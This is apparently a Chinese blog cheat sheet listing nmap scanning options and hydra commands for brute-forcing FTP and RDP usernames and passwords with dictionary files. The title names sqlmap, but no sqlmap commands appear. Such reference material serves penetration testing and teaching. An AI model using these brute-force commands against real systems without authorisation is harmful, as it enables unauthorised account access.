sqlmap和hydra常用命令
扫描与爆破
Nmap
重要常用命令参数
-sP ping扫描
例:
nmap -sP 10.1.1.0/24 (最后的24是采用二进制表示的掩码的位数)
-p 指定端口范围
例:
nmap -p 21,23 10.1.1.1(探测目标21,23端口情况)
-sV 服务版本探测
例:
nmap -p 23,21 10.1.1.1 -sV
-O 启用操作系统探测(同时可以扫描开放的端口号以及对应的服务)
例:
nmap -O 10.1.1.1
-A 全面扫描
-oN 保存txt(保存扫描报告)
例:
nmap -O 10.1.1.1 -oN d:\baogao.txt(保存路径)
hydra 常用命令
(转载自https://blog.csdn.net/weixin_63286108/article/details/124700517)
爆破FTP服务器登录密码(已知用户名)
1 | hydra -l admin -P /usr/passwd.txt ftp://192.168.31.134 |
爆破FTP服务器的用户名和密码(1)
1 | hydra -L /usr/uname.txt -P /usr/passwd.txt ftp://192.168.31.134 |
爆破FTP服务器的用户名和密码(2)
1 | hydra -C /usr/u_and_p.txt ftp://192.168.31.134 |
爆破远程桌面服务的用户名和密码
1 | hydra -L /usr/uname.txt -P /usr/passwd.txt rdp://192.168.31.134 |
(uname.txt、passwd.txt分别为用户名字典和密码字典)
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Enderman_1's blog!